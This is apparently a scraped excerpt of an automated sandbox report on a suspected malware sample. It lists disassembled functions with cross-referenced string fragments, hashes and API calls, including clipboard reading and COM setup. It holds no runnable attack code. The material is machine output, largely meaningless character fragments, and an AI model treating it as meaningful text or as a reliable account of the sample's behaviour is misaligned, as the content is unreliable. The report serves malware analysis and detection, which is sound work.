<, xrefs: 0043479B
B, xrefs: 00434835
P, xrefs: 00434897
0, xrefs: 004347B7
h, xrefs: 004348CF
;, xrefs: 004347F6
x, xrefs: 0043493F
m, xrefs: 00434B0E
@, xrefs: 00434827
6, xrefs: 004347E1
\, xrefs: 0043487B
l, xrefs: 004346EC
N, xrefs: 00434786
o, xrefs: 00434B16
b, xrefs: 00434915
4, xrefs: 00434BF5

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
API String ID: 0-1394229784
Opcode ID: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
Opcode Fuzzy Hash: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26

Function 009E4891 Relevance: 127.9, Strings: 102, Instructions: 417COMMON

Download Yara Rule

Strings

L, xrefs: 009E4A72
|, xrefs: 009E4BC2
m, xrefs: 009E4D75
%, xrefs: 009E4ACD
^, xrefs: 009E49C3
X, xrefs: 009E4AC6
;, xrefs: 009E4A5D
`, xrefs: 009E4B6E
!, xrefs: 009E4AA3
-, xrefs: 009E48B9
?, xrefs: 009E4937
t, xrefs: 009E4BFA
,, xrefs: 009E4992
(, xrefs: 009E4976
v, xrefs: 009E48E3
., xrefs: 009E4B2F
^, xrefs: 009E4AF0
B, xrefs: 009E4A9C
e, xrefs: 009E496F
8, xrefs: 009E49E6
\, xrefs: 009E4AE2
Z, xrefs: 009E4A17
M, xrefs: 009E489D
g, xrefs: 009E4D5D
p, xrefs: 009E4BDE
c, xrefs: 009E4D4D
t, xrefs: 009E4A4F
&, xrefs: 009E49D8
l, xrefs: 009E4B52
$, xrefs: 009E49CA
@, xrefs: 009E4A8E
:, xrefs: 009E49F4
*, xrefs: 009E4984
D, xrefs: 009E4AAA
", xrefs: 009E49BC
>, xrefs: 009E4ABF
r, xrefs: 009E4BEC
P, xrefs: 009E4AFE
+, xrefs: 009E4AF7
J, xrefs: 009E4A64
x, xrefs: 009E4BA6
], xrefs: 009E4BC9
i, xrefs: 009E4D65
T, xrefs: 009E4B1A
f, xrefs: 009E4B98
e, xrefs: 009E4D55
Z, xrefs: 009E49FB
t, xrefs: 009E48AB
~, xrefs: 009E4BD0
R, xrefs: 009E4B0C
p, xrefs: 009E48FF
=, xrefs: 009E4A79
N, xrefs: 009E49A7
a, xrefs: 009E4A95
O, xrefs: 009E4A09
N, xrefs: 009E4A80
e, xrefs: 009E491B
e, xrefs: 009E4945
~, xrefs: 009E48D5
4, xrefs: 009E4A3A
s, xrefs: 009E4B13
?, xrefs: 009E4ADB
z, xrefs: 009E4BB4
D, xrefs: 009E49D1
h, xrefs: 009E4B36
>, xrefs: 009E4A10
4, xrefs: 009E4E5C
%, xrefs: 009E48F1
V, xrefs: 009E4B28
}, xrefs: 009E4AE9
Z, xrefs: 009E4AD4
x, xrefs: 009E490D
1, xrefs: 009E4B21
2, xrefs: 009E4A2C
4, xrefs: 009E4E3A
N, xrefs: 009E49ED
), xrefs: 009E4A33
n, xrefs: 009E4B60
0, xrefs: 009E4A1E
<, xrefs: 009E4A02
v, xrefs: 009E4C08
, xrefs: 009E49AE
j, xrefs: 009E4B44
\, xrefs: 009E497D
o, xrefs: 009E4D7D
;, xrefs: 009E4A87
b, xrefs: 009E4B7C
U, xrefs: 009E498B
., xrefs: 009E49A0
[, xrefs: 009E49DF
l, xrefs: 009E4953
F, xrefs: 009E4AB8
0, xrefs: 009E4AB1
i, xrefs: 009E4929
~, xrefs: 009E4A25
d, xrefs: 009E4B8A
5, xrefs: 009E4961
k, xrefs: 009E4D6D
H, xrefs: 009E4A56
., xrefs: 009E4B05
6, xrefs: 009E4A48
C, xrefs: 009E4B83

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
API String ID: 0-1394229784
Opcode ID: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
Instruction ID: b9c689a09ae2abd92aaedc3d41d89d073116aca723ce00a6a2f2adfaf38186d8
Opcode Fuzzy Hash: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
Instruction Fuzzy Hash: 8122472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C1996B3C2C7BA0F89CB26

Function 00434098 Relevance: 36.6, Strings: 29, Instructions: 348COMMON

Download Yara Rule

Strings

{, xrefs: 00434331
z, xrefs: 0043432D
+, xrefs: 004340A4
0, xrefs: 00434427
>, xrefs: 004342D8
`, xrefs: 00434305
@, xrefs: 004341B2
|, xrefs: 00434335
C, xrefs: 004341BA
s, xrefs: 004341A2
h, xrefs: 0043414A
:, xrefs: 004342F9
a, xrefs: 0043415A
f, xrefs: 0043431D
`, xrefs: 00434142
{, xrefs: 0043418A
p, xrefs: 0043419A
w, xrefs: 004341AA
d, xrefs: 00434315
*, xrefs: 004340EA
b, xrefs: 0043430D
}, xrefs: 00434192
n, xrefs: 004342FD
<, xrefs: 004342CF
d, xrefs: 0043417A
n, xrefs: 00434162
g, xrefs: 0043416A
|, xrefs: 00434182
x, xrefs: 00434325

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
API String ID: 0-334816167
Opcode ID: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
Opcode Fuzzy Hash: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56

Function 009E42FF Relevance: 36.6, Strings: 29, Instructions: 348COMMON

Download Yara Rule

Strings

>, xrefs: 009E453F
{, xrefs: 009E43F1
f, xrefs: 009E4584
@, xrefs: 009E4419
*, xrefs: 009E4351
d, xrefs: 009E457C
|, xrefs: 009E459C
s, xrefs: 009E4409
z, xrefs: 009E4594
:, xrefs: 009E4560
|, xrefs: 009E43E9
`, xrefs: 009E43A9
0, xrefs: 009E468E
<, xrefs: 009E4536
C, xrefs: 009E4421
p, xrefs: 009E4401
n, xrefs: 009E4564
`, xrefs: 009E456C
g, xrefs: 009E43D1
h, xrefs: 009E43B1
+, xrefs: 009E430B
a, xrefs: 009E43C1
{, xrefs: 009E4598
x, xrefs: 009E458C
}, xrefs: 009E43F9
d, xrefs: 009E43E1
b, xrefs: 009E4574
w, xrefs: 009E4411
n, xrefs: 009E43C9

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
API String ID: 0-334816167
Opcode ID: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
Instruction ID: 7a352119a404c911b2f33d61f5721f69f7c72023dbda796cc73fef0ba7ec3db1
Opcode Fuzzy Hash: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
Instruction Fuzzy Hash: 4EF1D221D087E98ADB32C67C8C443CDBFA15B53324F1943D9D4E9AB3D2C6790A46CB92

Function 009E6447 Relevance: 28.6, APIs: 8, Strings: 8, Instructions: 636memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 009E6675
SysAllocString.OLEAUT32(FA46F8B5), ref: 009E66D1
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009E670E
SysAllocString.OLEAUT32(w!s#), ref: 009E6762
SysAllocString.OLEAUT32(A3q5), ref: 009E6808
VariantInit.OLEAUT32(?), ref: 009E687A
VariantClear.OLEAUT32(?), ref: 009E69DC
SysFreeString.OLEAUT32(00000000), ref: 009E6A1A

Strings

C, xrefs: 009E65D0
Y/9Q, xrefs: 009E67A4
z7}9A3q5, xrefs: 009E6822
T'g), xrefs: 009E6794
X&c8, xrefs: 009E64F6
w!s#, xrefs: 009E675D, 009E6761
BC, xrefs: 009E67CC
A;, xrefs: 009E66A3

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
API String ID: 2775254435-4124187736
Opcode ID: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
Instruction ID: b0c38310b4fd683e40dd7f33c36dd05c38e1a30cde2537fd45846cb9b98eb658
Opcode Fuzzy Hash: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
Instruction Fuzzy Hash: 6D12CAB2A083809BD714CF29C881B6BBBE6FBD5304F14892CF595DB291D774D905CB86

Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004310E0
GetWindowLongW.USER32 ref: 00431105
GetClipboardData.USER32 ref: 00431115
GlobalLock.KERNEL32 ref: 0043112E
GlobalUnlock.KERNEL32 ref: 00431240
CloseClipboard.USER32 ref: 00431249

Strings

x, xrefs: 0043117D
W, xrefs: 004311A5
], xrefs: 00431191
j, xrefs: 004311AA
P, xrefs: 0043119B
(, xrefs: 004311BE

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797

Function 00409230 Relevance: 18.0, Strings: 14, Instructions: 458COMMON

Download Yara Rule

Strings

sD/f, xrefs: 0040935D
LSJm, xrefs: 0040939D
<'=0, xrefs: 00409270
p~rs, xrefs: 00409355
R:e}, xrefs: 00409375
agsy, xrefs: 0040936D
7]7N, xrefs: 0040938D
PVNR, xrefs: 00409395
9/,8, xrefs: 00409268
; >?, xrefs: 00409280
wkoq, xrefs: 00409385
rz|x, xrefs: 004096CE
~p~9, xrefs: 00409365
`{R2, xrefs: 0040937D

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
API String ID: 0-2345621967
Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6

Function 009B9497 Relevance: 18.0, Strings: 14, Instructions: 458COMMON

Download Yara Rule

Strings

PVNR, xrefs: 009B95FC
sD/f, xrefs: 009B95C4
; >?, xrefs: 009B94E7
7]7N, xrefs: 009B95F4
wkoq, xrefs: 009B95EC
p~rs, xrefs: 009B95BC
R:e}, xrefs: 009B95DC
<'=0, xrefs: 009B94D7
~p~9, xrefs: 009B95CC
agsy, xrefs: 009B95D4
`{R2, xrefs: 009B95E4
rz|x, xrefs: 009B9935
9/,8, xrefs: 009B94CF
LSJm, xrefs: 009B9604

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
API String ID: 0-2345621967
Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
Instruction ID: 842cbdc50fd259c8050312ccb2b74787ac66c17098fba1d591a1b3fedf45d187
Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
Instruction Fuzzy Hash: B7C1497151C3958BD315CF2584A07ABBFE1EFD2354F1889ACE4E11B782D639890ACB62

Function 0040F9FD Relevance: 17.1, Strings: 13, Instructions: 892COMMON

Download Yara Rule

Strings

O, xrefs: 0040FEF0
t, xrefs: 0040FFD9
C, xrefs: 0040FBE0
4, xrefs: 0040FC42
+, xrefs: 004103F8
@, xrefs: 0040FFD1
\, xrefs: 00410289
g, xrefs: 0040FDEA
&, xrefs: 0040FBDB
Y, xrefs: 00410291
T, xrefs: 0040FC32
Z, xrefs: 00410299
q, xrefs: 0040FB73

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
API String ID: 0-2174627302
Opcode ID: f33d96a2bc0df413143d58eed916f3576d0cf951f49cf0b0560d95200afd1ae6
Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
Opcode Fuzzy Hash: f33d96a2bc0df413143d58eed916f3576d0cf951f49cf0b0560d95200afd1ae6
Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07

Function 009BFC64 Relevance: 17.1, Strings: 13, Instructions: 892COMMON

Download Yara Rule

Strings

+, xrefs: 009C065F
O, xrefs: 009C0157
@, xrefs: 009C0238
&, xrefs: 009BFE42
Y, xrefs: 009C04F8
Z, xrefs: 009C0500
t, xrefs: 009C0240
4, xrefs: 009BFEA9
q, xrefs: 009BFDDA
T, xrefs: 009BFE99
g, xrefs: 009C0051
\, xrefs: 009C04F0
C, xrefs: 009BFE47

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
API String ID: 0-2174627302
Opcode ID: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
Instruction ID: cab7f34065d74bcc8860ba5e26f96f3c4612bfd09d8c1e2a4395482460b213d0
Opcode Fuzzy Hash: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
Instruction Fuzzy Hash: 1072AD7160C7818BD3249F38C9957AFBBE1ABC6324F198E2DD5DA87392D6798441CB03

Function 009D8108 Relevance: 14.2, Strings: 11, Instructions: 461COMMON

Download Yara Rule

Strings

U1D3, xrefs: 009D844A
O)O+, xrefs: 009D843A
T!M#, xrefs: 009D842A
Q5Z7, xrefs: 009D8452
p-B/, xrefs: 009D8442
*B), xrefs: 009D82E2
XY, xrefs: 009D8534
*B), xrefs: 009D8582
\9X;, xrefs: 009D845A
V%G', xrefs: 009D8432
<=, xrefs: 009D8462

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: *B)$*B)$<=$O)O+$Q5Z7$T!M#$U1D3$V%G'$XY$\9X;$p-B/
API String ID: 0-898000180
Opcode ID: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
Instruction ID: 0e66c9179334ba3a39339471905faac63bf422e0821cee7cafbce2b82e6bb2ae
Opcode Fuzzy Hash: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
Instruction Fuzzy Hash: C5C11EB12883118BD714CF18C89266BB3F2EFE6754F08895DE8D68B395E734C902C796

Function 0042B4FC Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 519COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042B5FE

Strings

v, xrefs: 0042B5FE
1, xrefs: 0042BB59
/, xrefs: 0042B908
%(#}, xrefs: 0042B740
/26-, xrefs: 0042B735

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: %(#}$/$/26-$1$v
API String ID: 3664257935-1339040341
Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

IK, xrefs: 00423E83
>V, xrefs: 00424356
EG, xrefs: 00423E7C
<>, xrefs: 004240B0
4%, xrefs: 00423CD5
UW, xrefs: 00423E98
>V, xrefs: 004241B0
|~, xrefs: 0042402E

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0

Function 009D3C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

UW, xrefs: 009D40FF
EG, xrefs: 009D40E3
<>, xrefs: 009D4317
>V, xrefs: 009D4417
IK, xrefs: 009D40EA
>V, xrefs: 009D45BD
4%, xrefs: 009D3F3C
|~, xrefs: 009D4295

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: 2a94124f54bf3dd366c21737f507d4bae66a5c2b2d1b885a9e0a48fae0bc8537
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: 4D3242B0601B469FDB48CF2AD580389BBB1FF45300F548698C9695FB5ADB35A892CFC0

Function 00419770 Relevance: 10.0, APIs: 2, Strings: 3, Instructions: 1211COMMON

Download Yara Rule

APIs

Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE

FreeLibrary.KERNEL32(?), ref: 00419CD6
FreeLibrary.KERNEL32(?), ref: 00419D3B

Strings

v, xrefs: 00419CD6, 00419D3B
,)*k, xrefs: 00419E54
I,~M, xrefs: 0041A448

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: ,)*k$I,~M$v
API String ID: 764372645-892058270
Opcode ID: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
Opcode Fuzzy Hash: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A

Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON

Download Yara Rule

Strings

V3R5, xrefs: 00426774
@iB, xrefs: 0042693A, 00426DD8, 00426E0E
67, xrefs: 0042677F
*mB, xrefs: 00426D24

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: *mB$67$@iB$V3R5
API String ID: 0-119712241
Opcode ID: a30799564e50c90834a2424509ace6a7bad80dd76436b330a98f2931f18a1c6d
Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
Opcode Fuzzy Hash: a30799564e50c90834a2424509ace6a7bad80dd76436b330a98f2931f18a1c6d
Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86

Function 009DB763 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 519COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 009DB865

Strings

1, xrefs: 009DBDC0
/, xrefs: 009DBB6F
/26-, xrefs: 009DB99C
%(#}, xrefs: 009DB9A7

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: %(#}$/$/26-$1
API String ID: 3664257935-261129489
Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
Instruction ID: 462e2995b9c938c402884c95b915aafd84c0496ee5601ba2e603dc647288cffd
Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
Instruction Fuzzy Hash: 89E1C47155C3C18AE775CF2984607BBBBD6AFD2304F1988AED1C987292DB39450ACB12

Function 009C99D7 Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 009C9F3D
FreeLibrary.KERNEL32(?), ref: 009C9FA2

Strings

I,~M, xrefs: 009CA6AF
,)*k, xrefs: 009CA0BB

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: ,)*k$I,~M
API String ID: 3664257935-936430989
Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
Instruction ID: 79ae5f9b8f75a55858f5582866ce7ee5dbd470b43f6d0f1300a0f44730fa3772
Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
Instruction Fuzzy Hash: B582F574A083805BD7248F249884F2FBBE6EBD6718F28892CE5C5972A1D671DC41DB47

Function 009D1347 Relevance: 8.0, Strings: 6, Instructions: 536COMMON

Download Yara Rule

Strings

,, xrefs: 009D1885
h, xrefs: 009D1559
U, xrefs: 009D192A
!@, xrefs: 009D137D
V, xrefs: 009D1920
T, xrefs: 009D1925

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$T$U$V$h
API String ID: 0-1072848446
Opcode ID: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
Instruction ID: b0054a82475986e6ad1b45b7fd872a4b34d0e5f041a4b4dacf2fb19720beb057
Opcode Fuzzy Hash: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
Instruction Fuzzy Hash: C6229D7264C7909FD324CF28C45536EBBE1ABC6324F198E2EE5D987392D6798844CB43

Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

<k;m, xrefs: 0042069D
wy, xrefs: 00420675
B, xrefs: 00420ADF
2g1i, xrefs: 00420695
&', xrefs: 00420966
0c=e, xrefs: 0042068D

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$B$wy
API String ID: 0-2430453506
